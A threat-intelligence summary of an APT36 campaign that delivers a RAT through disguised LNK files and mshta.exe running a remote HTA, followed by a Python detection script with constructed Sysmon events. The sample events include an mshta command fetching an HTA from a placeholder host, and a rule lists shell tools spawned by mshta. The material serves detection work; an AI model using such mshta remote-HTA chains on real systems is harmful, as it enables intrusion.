
"The latest set of attacks began with a spear-phishing email containing a ZIP archive with a LNK file disguised as a PDF. Opening the file triggers the execution of a remote HTML Application (HTA) script using "mshta.exe" that decrypts and loads the final RAT payload directly in memory. In tandem, the HTA downloads and opens a decoy PDF document so as not to arouse users' suspicion."
""After decoding logic is established, the HTA leverages ActiveX objects, particularly WScript.Shell, to interact with the Windows environment," CYFIRMA noted. "This behavior demonstrates environment profiling and runtime manipulation, ensuring compatibility with the target system and increasing execution reliability, techniques commonly observed in malware abusing 'mshta.exe.'""
Transparent Tribe (APT36) targeted Indian governmental, academic, and strategic entities with a remote access trojan that grants persistent control of infected hosts. The campaign began with spear-phishing emails carrying ZIP archives that contain LNK files masquerading as PDFs; opening the LNK executes an HTA via mshta.exe, which decrypts and loads the RAT directly into memory while opening a decoy PDF. After decoding, the HTA leverages ActiveX objects, notably WScript.Shell, for environment profiling and runtime manipulation that improves execution reliability. The threat actor maintains an evolving toolkit that includes CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT, and the malware adapts its persistence techniques to the antivirus products present on the host.
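Detection logic for the mshta.exe chain described above, as an added example that is not from the article or from CYFIRMA's report: three rules run over constructed Sysmon-style process-creation events (Image, ParentImage, CommandLine). The hostnames, paths, rule names and the assumption that the decoy PDF is opened through a WScript.Shell child process are all hypothetical.

```python
import re

# Constructed sample events in the shape of Sysmon Event ID 1 fields;
# not real telemetry from the campaign, hostnames and paths are invented.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\explorer.exe", "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": "explorer.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe https://EXAMPLE-HOST.invalid/report.hta"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\Program Files\Vendor\setup.hta"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'cmd.exe /c start "" "C:\\Users\\u\\AppData\\Local\\Temp\\decoy.pdf"'},
]

REMOTE_URL = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the names of the rules matched by one process-creation event."""
    hits = []
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event.get("CommandLine", "")
    # Rule 1 (high confidence): mshta.exe given a remote URL, i.e. fetching an HTA
    # from the network rather than running a local file.
    if image == "mshta.exe" and REMOTE_URL.search(cmd):
        hits.append("mshta_remote_hta")
    # Rule 2 (low confidence, triage only): mshta.exe started by explorer.exe, which is
    # what a double-clicked LNK looks like; local installers also trip this rule.
    if image == "mshta.exe" and parent == "explorer.exe":
        hits.append("mshta_from_explorer")
    # Rule 3: mshta.exe spawning a shell. Assumed here: a WScript.Shell.Run call in the
    # HTA (for example to open the decoy PDF) shows up as exactly this parent/child pair.
    if parent == "mshta.exe" and image in SHELL_CHILDREN:
        hits.append("mshta_spawns_shell")
    return hits


def detect(events: list) -> list:
    """Return (index, matched_rules) for every event that matched at least one rule."""
    out = []
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            out.append((i, hits))
    return out


if __name__ == "__main__":
    for idx, rules in detect(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"], rules)
```

Rule 2 alone is noisy on hosts that run legitimate HTA installers; the value is in correlating it with rule 1 or rule 3 on the same process tree.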
Read at The Hacker News